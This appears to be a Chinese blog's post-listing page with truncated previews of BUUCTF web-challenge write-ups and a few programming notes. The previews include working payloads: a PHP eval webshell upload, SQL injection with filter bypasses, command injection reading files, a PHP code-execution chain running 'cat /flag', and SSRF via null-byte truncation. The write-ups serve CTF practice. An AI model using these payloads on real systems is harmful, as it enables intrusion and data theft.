自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(32)
  • 资源 (1)
  • 收藏
  • 关注

原创 BUUCTF [MRCTF2020]Ezpop 1

BUUCTF [MRCTF2020]Ezpop 1Welcome to index.php<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//And Crack It!class Modifier { pr

2021-04-21 00:37:32 10

原创 buuCTF [BJDCTF2020]EasySearch 1

buuCTF [BJDCTF2020]EasySearch 1进去后是这样扫后台发现index.php.swp备份。这里吐槽一下。我用dirsearch扫了3次都没出来,最后用dirmap指定字典才出来。网上的字典大部分没包含index.php.swp的,还要自己添加到字典里。要求password的md5值的前6个字符为6d0bc1。敲代码(python):from hashlib import md5for i in range(10000000): if md5(str(i).

2021-04-14 08:27:42 7 1

原创 python crc-16 crc-16校验码 crc-16校验算法 ppp(MAC)帧检验序列FCS

python crc-16 crc-16校验码 crc-16校验算法 ppp(MAC)帧检验序列FCS想弄明白这里要看多几遍,配合下面的例子能更快理解。第一、CRC-16校验码计算方法:常用查表法和计算法。计算方法一般都是:(1)、预置1个16位的寄存器为十六进制FFFF(即全为1),称此寄存器为CRC寄存器;(2)、把第一个8位二进制数据(既通讯信息帧的第一个字节)与16位的CRC寄存器的低8位相异或,把结果放于CRC寄存器,高八位数据不变;(3)、把CRC寄存器的内容右移一位(朝低位)用

2021-04-04 23:07:43 23

原创 thinkphp6 用phpenv安装部署站点

打开phpenv,点击开始->软件设置->高级把两个选项打开。点击目录->网站目录它在phpEnv\www 下,这里的文件存放你的代码文件。文件名为域名。我默认你下载了thinkphp,下载完后的文件就叫think,你可以把它直接作为域名,或者重命名为其他格式,比如www.thinkphp.com。然后回来,点击站点管理->增加。域名写phpEnv\www下的文件夹名,如果你重命名了,则用重命名后的名字。目录选phpEnv\www下的你要部署的文件夹名,点击新.

2021-03-20 20:58:47 13

原创 buuctf [SWPU2019]Web1 1

buuctf [SWPU2019]Web1 1 sql 无列名注入注册登录发布广告1'测试存在sql注入经测试,or,空格,#被过滤不能用order by测试列数,用group by代替注释符#用,'3代替,数字随便(这里的'相当于闭合了输入语句里参数的右引号,变成'3'字符串,此时整个语句没有注释符)(如果参数不在sql语句末尾,那不是失败了?有无懂哥?)空格用/**/代替1'/**/group/**/by/**/22,'31'/**/group/**/by/**/23,'

2021-03-13 16:07:54 22

原创 反序列化字符逃逸 个人笔记

反序列化字符串逃逸 个人笔记flag在flag.php最后提取文件内容函数file_get_contents(email)。所以email要等于flag.php。但只有p1能传参,只能在p1入手。做过类似的题一看就知道是反序列化字符逃逸,a序列化后又反序列化中间只有一行替换语句这个傻瓜操作一看就知道。详细原理网上很多自己搜。大概就是p1的“z”字符被“ha”字符串替换,每次替换总的字符串a长度加1,但这是序列化后替换的,而反序列时会根据字符串前的s(string的意思)后的数字(这个数字序列化后固

2021-03-08 16:11:35 14

原创 buuctf日记 [CISCN 2019 初赛]Love Math 1

buuctf日记 [CISCN 2019 初赛]Love Math 1payloadc=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{abs}($$pi{acos})&abs=system&acos=cat /flagbase_convert(37907361743,10,36) #把十进制数“37907361743”转为36进制(0-9,a-z)base_convert(37907361743,10,3

2021-03-06 15:31:27 8

原创 buuctf刷题日记 [网鼎杯 2020 朱雀组]phpweb 1

buuctf刷题日记 [网鼎杯 2020 朱雀组]phpweb 1看源码,扫后台没有什么信息。抓包后看见func=date&p=Y-m-d+h%3Ai%3As+a很像date()函数的运用方法,p的参数类似data()的参数。返回时间日期等,调用func的函数date(),以p的内容作为函数参数,就是call_user_func()函数的用法。构造payload获取index.php源码func=file_get_contents&p=index.php<?php

2021-03-04 14:16:17 8

原创 BUUCTF [De1CTF 2019]SSRF Me 1

BUUCTF [De1CTF 2019]SSRF Me 1把代码整理,添上一些注释#! /usr/bin/env python# encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')

2021-03-04 00:17:21 35 1

原创 kali linux vmware-2020.4版本 和 vmware 15.5.7 百度网盘下载

kali注意事项kali linux vmware-2020.4版本 和 vmware 15.5.7。自行选取下载链接:https://pan.baidu.com/s/1TXa29uvRGijl9MrhyWG9Vw 提取码:8uonkali installer 版本要自己设置下载安装系统和程序(如果你试了无数次kali安装还没成功,先用vm版本吧),vmware版本是已经帮你装好了。默认用户名密码都是kali也可去官网下载,下拉可发现。安装教程可以看这一篇,里面包括了设置中文界面安装中文输入

2021-02-01 14:45:16 579

原创 BUUCTF [GKCTF2020]cve版签到 1

提示参数只能以.ctfhub.com 结尾。以题目的角度意思为对结尾进行字符串匹配过滤。提示的cve-2020-7066漏洞是get_headers()函数会被%00截断,会造成ssrf输入/?url=http://127.0.0.1%00.ctfhub.com访问目标访问内部资源敏感信息–>“flag”输入/?url=http://127.0.0.123%00.ctfhub.com...

2021-01-20 21:53:57 32

原创 BUUCTF [网鼎杯 2018]Fakebook 1

BUUCTF [网鼎杯 2018]Fakebook 1join(注册)一个账号,按用户名进入主页发现注入点nono=1 order by 4#没事no=1 order by 5#报错,有4列no=-1 union/**/select 1,2,3,4#过滤了(union select)用/**/代替空格 回显位是2,注意到有反序列化函数。爆表名no=-1 union/**/select 1,group_concat(table_name),3,4 from information_sc

2021-01-19 13:04:42 147

转载 2021-01-18

来到sql注入骚姿势,我们一点一点开始学我们来到这道题,然后尝试注入,结果发现拼接’or ‘1’='1'or ‘1’='2如果是字符型注入则会报错,然而并没有而是显示的页面一样,通过常规注入,回显的页面都是最后,我们发现这道题是xpath报错注入,函数注入extractvalue()extractvalue() :对XML文档进行查询的函数语法:extractvalue(目标xml文档,xml路径)第一个参数 : 第一个参数可以传入目标xml文档第二个参数: xml中的位置是可操作

2021-01-18 18:41:45 10

原创 BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1

BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack Worldbuu 限制访问频率所以要时间间隔久点改这个函数time.sleep(0.1)import requestsimport timeimport reurl='http://2c82f86e-108a-4aa5-b1d2-49fc08b0f2f9.node3.buuoj.cn/index.php'flag = ''for i in range(1,50): max = 127 min = 0

2021-01-18 18:18:06 46

原创 BUUCTF [SUCTF 2019]CheckIn 1

BUUCTF [SUCTF 2019]CheckIn 1文件包含,一句话木马上传。直接上传一句话木马<?php eval($_POST['a']);?>非法后缀那就改后缀绕过,通常有phtml php3 php4 php5 Php php (空格) php pphphp都试试,都不行。这时候可以用图片上传。在一个文件夹中随便复制粘贴来一张照片,创建一个txt文本,输入GIF89a<script language=php>eval($_POST['a']);&l

2021-01-17 16:20:47 34

原创 BUUCTF [HCTF 2018]admin 1

BUUCTF [HCTF 2018]admin 1进去后是这样,右上角有注册登录。看看主页源码。看来如果是admin(管理员)会有东西不同。随便注册一个账号,登录(注册登录的源码都看看,所有的页面源码都要看!找提示,甚至一行一行代码看)。在改密码界面看到:输网址,下载。用pycharm或其他打开,审计代码。先看路由(route)没什么特别的,就其他都看看。最后在templates目录下的index.html找到如果session等于admin就出hctf{},即flag。而提示

2021-01-15 19:29:31 104

原创 BUUCTF [极客大挑战 2019]BabySQL 1sql注入

BUUCTF [极客大挑战 2019]BabySQL 1进去后是这样:还是熟悉的配方,还是熟悉的味道。题目就是sql注入,就不检测是否有注入点了。输入1' or 1=1;#emmm…暂时看不懂什么意思现在就可以胡乱的输入一些注入语句了。发现报错都是部分输入的语句,这说明没报错的语句没了,或者替换掉了,对,没错,可能是用replace函数换成空了。现在证实这个猜想。在username输入1'%23就是1'#的意思:用户名密码错误!说明我们的sql语句1'#是可执行的,也就是说之前的报错就

2021-01-14 22:39:32 85

原创 BUUCTF [极客大挑战 2019]PHP 1

BUUCTF [极客大挑战 2019]PHP 1-刷题日记进去后是这样:提示备份,用dirsearch或dirmap扫出来(怎么安装上网找,很多教程,实在不会可以问我(除了dirmap))。搜个大字典下载,自带的字典很少。py3 dir.py -u http://3c25afd0-8c4a-4832-8e11-f182ffcccae4.node3.buuoj.cn/ -e * -w db/dir.txt-u+地址 -e选择语言 -w选择字典要多试几次,有时扫不出来,真的坑。(御剑更坑!)输

2021-01-14 14:16:22 120 3

原创 python3和pip

如果你的Python2版本是2.7.9以上或你的Python3版本是3.4以上则安装Python会自带pip在你的Python文件的Scripts里如\Python39\Scripts如果没有则要去官网下载:pip官网可以再命令提示符输入python -m pip -V查看是否安装了pip,若有则回显pip版本我这的py3是我重命名了python.exe->py3.exe因为有时会用到py2。当然前提是你已经设置好了Python的环境变量。若没有则要先进入Python目录,再执行pyth.

2021-01-13 11:56:06 8

原创 BUUCTF RoarCTF 2019]Easy Calc 1

BUUCTF RoarCTF 2019]Easy Calc 1-刷题个人日记小白一个,写给自己看。进去后是这样:随便输入几个运算,就是一个普通的计算器。尝试sql注入,输入1'和1'#:好8,计算器怎么会连接数据库呢,想太多了。(不过实战也是能想到的方法都试试)ctrl+u看网页代码,发现了一个网页:calc.php进去看看:所以之前的网页只是障眼法。这才是我们要目标。构造payload/calc.php? num=2;var_dump(scandir(chr(47)))找到f1

2021-01-12 20:56:13 117

原创 BUUCTF [护网杯 2018]easy_tornado 1

BUUCTF [护网杯 2018]easy_tornado 1-刷题个人日记小白一个,写给自己看。进去后是这样:个个点开看看。网址里有参数filename和filehash推测这里flag应该是filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(filename))里面,filehash里hash就是提示为md5的hash加密。filename知道了,cookie_secret在哪呢?hints提示render(详情请看rend

2021-01-12 14:03:34 203

原创 buuctf [GXYCTF2019]Ping Ping Ping 1

buuctf [GXYCTF2019]Ping Ping Ping 1-刷题个人日记小白一个,写给自己看。进去后是这样:ctrl+u看网页源码也没什么,随便输个数据看看:源码一样没什么。看题目提示,试试你能想到的方法,比如sql注入:输入ip=1'不是sql注入,试完了发现是命令执行,输入/?ip=1;ls两个都看看,先看index.php输入:/?ip=1;cat index.php看来过滤了空格再输入/?ip=1;cat$IFS$1index.phpIFS在系统命令

2021-01-11 18:17:38 63 1

原创 buu [极客大挑战 2019]LoveSQL 1

buu [极客大挑战 2019]LoveSQL 1 -刷题个人日记小白一个,写给自己看。进去后是这样:用户名输入1和1'测试发现1'报错有sql语法错误,说明有sql注入点且后台数据库是MariaDB用户名输入sql注入基本公式:1' or 1=1;#结果:3bba40d66c98e28cf3bac11b45edbbab像是md5编码,试试解码后不行。可能flag在其他表里,我们要知道有哪些表且表的属性有哪些。慢慢来,payload:check.php?username=admin'

2021-01-10 21:16:38 29

原创 [ACTF2020 新生赛]Include 1

[ACTF2020 新生赛]Include1 -刷题个人日记小白一个,写给自己看。打开后是这样:点击tips后:ctrl+u查看网页代码+抓包:没有发现什么有用的信息。查看题目和网址的file参数,提示这是文件包含的题构造payload:file=php://filter/read=convert.base64-encode/resource=flag.php读出源码,进行base64解码得出flag:flag{ef7e62e5-5ed4-4f53-8c7c-fb80aaabf7cc}

2021-01-10 14:25:55 162 1

原创 windows sqlmap 安装教程

windows sqlmap 安装教程要有python 2.7的环境选择对应你电脑的版本和下载sqlmap先弄python把下载好的python2.7放在一个你记得住的目录下后解压缩(如果你有很多工具但不知道他们在哪,从现在开始整理8,不然像我这样乱七八糟的,下载过一次的py2.7都不知道放哪了。此外,有个极大提高搜索文件效率的软件叫 listary 可以自己尝试下载)解压后复制粘贴python.exe然后重命名为python27,这个用来区别你安装的python3,就算你没安装以后也会用

2021-01-08 20:45:49 179

原创 buuctf [强网杯 2019]随便注 1

buuctf web [强网杯 2019]随便注 1 -刷题个人日记小白一个,写给自己看。打开后是这样。从题目和内容来看就是一道sql注入题。输入1' or 1=1;#这个#用来注释掉后面的sql语句显示所有数据,这个数据有什么用我也不知道,但sql注入一般第一步就是这样看看有没有有用的信息(没有)。输入1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。输入1'; show tables;#可以看到有 191981093

2021-01-07 22:12:35 235

原创 BUUCTF web WarmUp writeup

BUUCTF web WarmUp-刷题个人日记小白一个,写给自己看。[打开后是这样]按F12后发现一个文件,输入后: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.

2020-12-19 10:36:27 28 1

原创 pta 7-1 求两个一元多项式的和

我们老师教的是用顺序表,感觉比链表简单些,废话不多说,直接上代码。#include<iostream>#include<cstdio>using namespace std;typedef struct{ int x; int y;}Node;typedef struct{ Node data[1005]; int length;}SqLis...

2020-04-08 01:34:12 554

原创 *PTA打印沙漏**L1-002打印沙漏

PTA打印沙漏L1-002打印沙漏每次增加2x(i+2)个符号,一到四行的符号数分别是1,7,17,31。分别是1+2x3+2x5+2x7每运算一次加法的和先搞定1到6,因为我觉得一块弄不好搞。然后如果n大于7,则先计算出行数(b行)再分别输出漏斗上下部分。最后再输出没用到的符号数,如果是0也要输出。#include<iostream>#include<cstdio&gt...

2020-01-11 17:27:37 67

原创 - HDU - 2014 青年歌手大奖赛_评委会打分

- HDU - 2014 青年歌手大奖赛_评委会打分有三种方法,从简到难,循序渐进,大家各取所取吧,当然最好全部都会啦。话不多说,直接上代码。#include<stdio.h>int main(){ int n,a,sum; while (scanf ("%d", &n) != EOF) { sum = 0; int mi = 0; int ma...

2019-09-21 16:03:53 55

原创 - HDU - 2008 数值统计

- HDU - 2008 数值统计#include<stdio.h>int main(){ int n,x,y,z; double a; //注意题目要求输入时实型!!不能用int  while (scanf ("%d", &n) != EOF && n != 0)//也可以用if(n == 0) break;不过这个...

2019-09-20 19:11:08 157

原创 - HDU - 2007 平方和与立方和

标题欢迎使用Markdown编辑器你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。新的改变我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客:全新的界面设计 ,将会带来全新的...

2019-09-20 12:27:43 162

PTA打印沙漏L1-002打印沙漏

个人的想法,通俗易懂。

2020-01-11

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除